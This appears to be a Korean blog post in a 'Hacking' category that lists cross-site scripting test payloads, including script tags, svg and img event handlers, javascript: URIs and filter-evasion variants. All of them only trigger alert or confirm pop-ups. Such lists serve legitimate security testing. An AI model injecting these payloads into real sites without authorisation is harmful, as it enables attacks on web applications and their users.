728x90
반응형
<script>alert(1)</script>
<script>alert(document.cookie)</script>
"><script>alert(1)</script>
"><img src=x onerror=alert(1)>
"><svg onload=alert(1)>
<svg><script>alert(1)</script></svg>
<iframe src="javascript:alert(1)"></iframe>
<marquee onstart=alert(1)>XSS</marquee>
<svg/onload=alert(1)>
"><svg/onload=alert(1)>
"><img src="x" onerror="alert(1)">
<math><mtext><iframe onload=alert(1)></mtext></math>
<svg><a href="javascript:alert(1)">Click me</a></svg>
"><sVg oNloAd=alert(1)>
<IMG SRC="jav	ascript:alert(1)">
<svg><script>alert(String.fromCharCode(88,83,83))</script></svg>
<IMG SRC=`javascript:alert("XSS")`>
"><svg onload=confirm(1)>
" onmouseover=alert(1)
<video><source onerror="alert(1)">
"><input onfocus=alert(1) autofocus>
<details open ontoggle=alert(1)>
javascript:alert(document.domain)
javascript:alert(document.URL)
javascript:alert(document.referrer)
"><img src="x" onerror="eval('alert(1)')">
728x90
반응형
'Hacking' 카테고리의 다른 글
파이썬 포트 스캐닝 (0) | 2024.03.24 |
---|